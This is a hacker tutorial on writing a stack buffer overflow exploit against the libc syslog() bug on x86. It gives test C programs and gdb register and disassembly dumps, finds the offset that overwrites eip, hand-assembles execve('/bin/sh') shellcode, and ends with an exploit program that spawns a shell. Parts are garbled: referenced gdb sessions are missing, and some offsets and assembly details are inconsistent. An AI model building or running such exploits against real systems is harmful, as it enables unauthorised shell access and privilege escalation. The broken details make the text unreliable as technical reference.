How_to_write_Buffer_Overflows
--------syslog_test_1.c------------
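#include <syslog.h>
char buffer[4028];
int main(void) {
    int i;
    /* fill the buffer with 'A' (0x41), leaving the final byte as the terminator */
    for (i = 0; i < (int)sizeof buffer - 1; i++)
        buffer[i] = 'A';
    syslog(LOG_ERR, buffer);
    return 0;
}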
--------end syslog_test_1.c----------
Compile the program and run it. Make sure you include the symbol table for the debugger or not... depending
upon how macho you feel today.
bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)
The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definitely an attempt
to access some memory address that we shouldn't. If you do much in C with pointers on a Unix machine you
have probably seen this (or 'Bus error') when pointing or dereferencing incorrectly.
Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you
can learn a bit about gdb), the steps would be as follows:
Ok, this is good. The 41's you see are the hex equivalent for the ascii character 'A'. We are definitely going
places where we shouldn't be.
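If you want to convince yourself where a register full of 41's comes from, here is a minimal sketch in C. The helper name word_of_filler is made up for illustration and is not part of the test programs; it just fills four bytes with one character and reads them back as a 32-bit word, which is roughly what the debugger shows you.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical helper (not from the original programs): fill four bytes
   with the same filler character and read them back as one 32-bit word. */
uint32_t word_of_filler(char filler) {
    char bytes[4];
    uint32_t word;

    memset(bytes, filler, sizeof bytes);   /* e.g. 'A' 'A' 'A' 'A' */
    memcpy(&word, bytes, sizeof word);     /* reinterpret as a 32-bit value */
    return word;
}
```

Calling word_of_filler('A') gives 0x41414141, so that is the pattern to look for in a register dump. Since all four bytes are identical, byte order doesn't matter here.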
(gdb) info all-registers
eax 0xefbfd641 -272640447
ecx 0x00000000 0
edx 0xefbfd67c -272640388
ebx 0xefbfe000 -272637952
esp 0xefbfd238 0xefbfd238
ebp 0xefbfde68 0xefbfde68
esi 0xefbfd684 -272640380
edi 0x0000cce8 52456
eip 0x00001273 0x1273
ps 0x00010212 66066
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39
The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are
really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also
called Program Counter]. It points to the memory location of the next instruction the processor will execute.
By overwriting this you can point to the beginning of your own code and the processor will merrily start
executing it assuming you have it written as native opcodes and operands.
In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do
the following:
If you are familiar with Microsoft assembler this will look a bit backwards to you. For example: in Microsoft
syntax 'mov ax,cx' moves cx to ax. In AT&T syntax 'mov ax,cx' moves ax to cx. So put on those warp
refraction eye-goggles and on we go.
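A quick way to get the AT&T operand order into your fingers is a one-instruction gcc inline assembly sketch. The helper copy_with_mov is hypothetical, and the sketch assumes gcc (or a compatible compiler) with its default AT&T syntax. On a non-x86 target it falls back to a plain C assignment so it still compiles.

```c
/* Hypothetical helper: copy src into dst with a single mov instruction. */
unsigned int copy_with_mov(unsigned int src) {
    unsigned int dst = 0;
#if defined(__i386__) || defined(__x86_64__)
    /* AT&T order: source first, destination second.
       %1 is src (input operand), %0 is dst (output operand). */
    __asm__("movl %1, %0" : "=r"(dst) : "r"(src));
#else
    dst = src;  /* assumption: non-x86 build, no inline asm used */
#endif
    return dst;
}
```

The thing to notice is that the source operand (%1) is written first and the destination (%0) second, which is the reverse of what a Microsoft-style assembler expects.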
Let's go back and tweak the original source code some, eh?
-------------syslog_test_2.c-------------
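#include <syslog.h>
char buffer[4028];
int main(void) {
    int i;
    /* 2024 bytes of 'A': reaches up to, but not into, the saved eip */
    for (i = 0; i < 2024; i++)
        buffer[i] = 'A';
    syslog(LOG_ERR, buffer);
    return 0;
}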
-----------end syslog_test_2.c-------------
Now we move it along until we figure out where eip lives in the overflow (the saved eip sits right after the
saved ebp on this architecture). With that known, we only have to add 4 more bytes to our buffer of 'A's and
we will overwrite eip completely.
---------syslog_test_3.c----------------
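#include <syslog.h>
char buffer[4028];
int main(void) {
    int i;
    /* 2028 bytes of 'A': 4 more than before, enough to cover the saved eip */
    for (i = 0; i < 2028; i++)
        buffer[i] = 'A';
    syslog(LOG_ERR, buffer);
    return 0;
}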
-------end syslog_test_3.c------------
bash$ !gc
gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf
BINGO!!!
Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer
[2027] we can load it up with whatever we need. The question is... what do we need?
On the Intel x86 architecture [a pentium here but that doesn't matter] incl %ecx is opcode 0100 0001 or
41 hex, and addb %al,(%eax) is the two zero bytes 00 00. We will load up buffer[2024] to buffer[2027] with the
address of 0xc73c where we will start our code. You have two options here: one is to load the buffer up with
the opcodes and operands and point the eip back into the buffer; the other option, which is what we are going
to be doing, is to put the opcodes and operands after the eip and point to them.
The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't
clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the
assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This
will require you to know enough about the native chip architecture and opcodes to do this [easy enough for
some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for
Alpha I think ;-)].
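To see why a 0x0 byte is such a nuisance, here is a small sketch of how much of a byte sequence a C string routine will actually look at. The helper visible_length is a made-up name for illustration; it only assumes the usual rule that string handling stops at the first zero byte.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: how many of the len bytes in data a C string
   routine would process before stopping at the first 0x00 byte. */
size_t visible_length(const unsigned char *data, size_t len) {
    const unsigned char *nul = memchr(data, 0x00, len);

    /* No zero byte found: every byte is visible. */
    return nul ? (size_t)(nul - data) : len;
}
```

For the four bytes 90 90 00 5e this returns 2: everything from the zero byte onward is invisible to anything that treats the data as a string.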
The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in
them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of
the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the
section you start to overwrite here contains your environment variables and other whatnots.... upon
successfully running your created code you might be dropped back into a big void. Deal with it.
The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the
buffer up with as filler.
Ahhh, but what if you don't know what the opcodes are for the particular architecture you are on? No problem.
gcc has a wonderful extension, the __asm__("...") statement, which drops assembly straight into your C source.
I rely upon this heavily for doing buffer overflows on architectures that I don't have assembler books for.
------nop.c--------
void main(){
__asm__("nop\n");
}
----end nop.c------
Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte.
Examining that byte shows us that it is 0x90 (hex).
------ syslog_test_4.c---------
#include <syslog.h>
char buffer[4028];
void main() {
int i;
i=2024;
buffer[i++]=0x3c;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------
Notice you need to load the eip backwards, i.e. 0000c73c is loaded into the buffer as 3c c7 00 00, because the
x86 stores the least significant byte first.
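The byte order is easy to get wrong by hand, so here is a minimal sketch that splits a 32-bit value into the order the x86 keeps it in memory. The helper store_le32 is a hypothetical name and is not part of the test programs.

```c
#include <stdint.h>

/* Hypothetical helper: write a 32-bit value into out[0..3],
   least significant byte first (x86 byte order). */
void store_le32(uint32_t value, unsigned char out[4]) {
    out[0] = (unsigned char)(value & 0xff);          /* lowest byte  */
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);  /* highest byte */
}
```

Feeding it 0x0000c73c fills out[] with 3c c7 00 00, which matches the four assignments in syslog_test_4.c.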
Now the question we have is what is the code we insert from here on?
Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do
something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to
execute in C code:
------execute.c--------
#include <stdio.h>
#include <unistd.h>
int main(void)
{
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
return 1; /* only reached if execve() fails */
}
----end execute.c-------
Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the
towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave
activity period). Here's the gdb scoop:
bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10b8:
0x1088 : pushl %ebp
0x1089 : movl %esp,%ebp
0x108b : subl $0x8,%esp
0x108e : movl $0x1080,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1083
0x10a7 : call 0x10b8
0x10ac : leave
0x10ad : ret
0x10ae : addb %al,(%eax)
0x10b0 : jmp 0x1140
0x10b5 : addb %al,(%eax)
0x10b7 : addb %cl,0x3b05(%ebp)
End of assembler dump.
This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system
call and this is what we are going to have our program execute (i.e. let the kernel service run it as opposed to
having to write it from scratch).
0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.
(0x1080 contains the arguments...which I haven't been able to really clean up).
We will replace this address with the one where our string lives [when we decide where that will be].
[main]
0x108d : movl %esp,%ebp
[execve]
0x10b8 : leal 0x3b,%eax
0x10be : lcall 0x7,0x0
All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't
necessary but I have it in still as I haven't fine tuned this yet.
I clean up eax. I don't remember why I do this and it shouldn't really be necessary.
xorl %eax,%eax
We will encapsulate the actual program with a jmp to somewhere and a call right back to the instruction after
the jmp. This pushes ecx and esi onto the stack.
jmp 0x???? # this will jump to the call...
popl %esi
popl %ecx
----------------------------------------------------------------------
movl %esp,%ebp
xorl %eax,%eax
jmp 0x???? # we don't know where yet...
# -------------[main]
movl $0x????,0xfffffff8(%ebp) # we don't know what the address will
# be yet.
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffff8(%ebp),%eax
pushl %eax
pushl $0x???? # we don't know what the address will
# be yet.
# ------------[execve]
leal 0x3b,%eax
lcall 0x7,0x0
----------------------------------------------------------------------
There are only a couple more things that we need to add before we fill in the addresses to a couple of the
instructions.
Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the
stack to simulate it.
# ------------[execve]
pushl %ecx
leal 0x3b,%eax
lcall 0x7,0x0
The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the
'leal 0xfffffff8(%ebp),%eax' to 'leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].
So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):
movl %esp,%ebp
xorl %eax,%eax # we added this
jmp 0x???? # we added this
popl %esi # we added this
popl %ecx # we added this
movl $0x????,0xfffffff5(%ebp)
movl $0x0,0xfffffffc(%ebp)
pushl $0x0
leal 0xfffffffc(%ebp),%eax # we changed this
pushl %eax
pushl $0x????
leal 0x3b,%eax
pushl %ecx # we added this
lcall 0x7,0x0
call 0x???? # we added this
To figure out the bytes to load up our buffer with for the parts that were already there run gdb on the execute
program.
Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are
pulling out of the execute program. You can figure out the basic structure for the call command by looking at
the one in execute that calls execve. Of course you will eventually need to put in the proper address.
When I work this out I break down the whole program so I can see what's going on. Something like the
following
For commands that you don't know the opcodes to you can find them out for the particular chip you are on by
writing little scratch programs.
----pop.c-------
void main() {
__asm__("popl %esi\n");
}
---end pop.c----
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x5e
So, 0x5e is popl %esi. You get the idea. After you have gotten this far build the string up (put in bogus
addresses for the ones you don't know in the jmp's and call's, just so long as the right amount of
space is being taken up by the jmp and call instructions; likewise for the movl's, where we will need to know
the memory location of 'sh\0\0/bin/sh\0').
After you have built up the string, tack on the chars for sh\0\0/bin/sh\0.
Compile the program and load it into gdb. Before you run it in gdb set a break point for the syslog call.
Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the
beginning. Our data should be right after it and indeed we see that it is.
(gdb) x/13bc 0xc770
0xc770 : 115 's' 104 'h' 0 '\000' 47 '/' 98 'b' 105 'i' 110 'n' 47 '/'
0xc778 : 115 's' 104 'h' 0 '\000' 0 '\000' 0 '\000'
Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you
should also be able to put in the appropriate operands for the jmp and call. Congrats... you are done. Here's
what the output will look like when you run this on a system with the unpatched libc/syslog bug.
bash$ buf
$ exit (do whatever here... you spawned a shell!!!!!! yay!)
bash$
#include <syslog.h>
char buffer[4028];
void main () {
int i;
buffer[2024]=0x3c;
buffer[2025]=0xc7;
buffer[2026]=0x00;
buffer[2027]=0x00;
i=2028;
buffer[i++]=0x00;
#ifdef z_out
buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
buffer[i++]=0x45;
buffer[i++]=0xf8;
#endif
buffer[i++]=0x00;
buffer[i++]=0x07;
buffer[i++]=0x00;
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]='/';
buffer[i++]='b';
buffer[i++]='i';
buffer[i++]='n';
buffer[i++]='/';
buffer[i++]='s';
buffer[i++]='h';
buffer[i++]=0x00;
buffer[i++]=0x00;
syslog(LOG_ERR, buffer);
}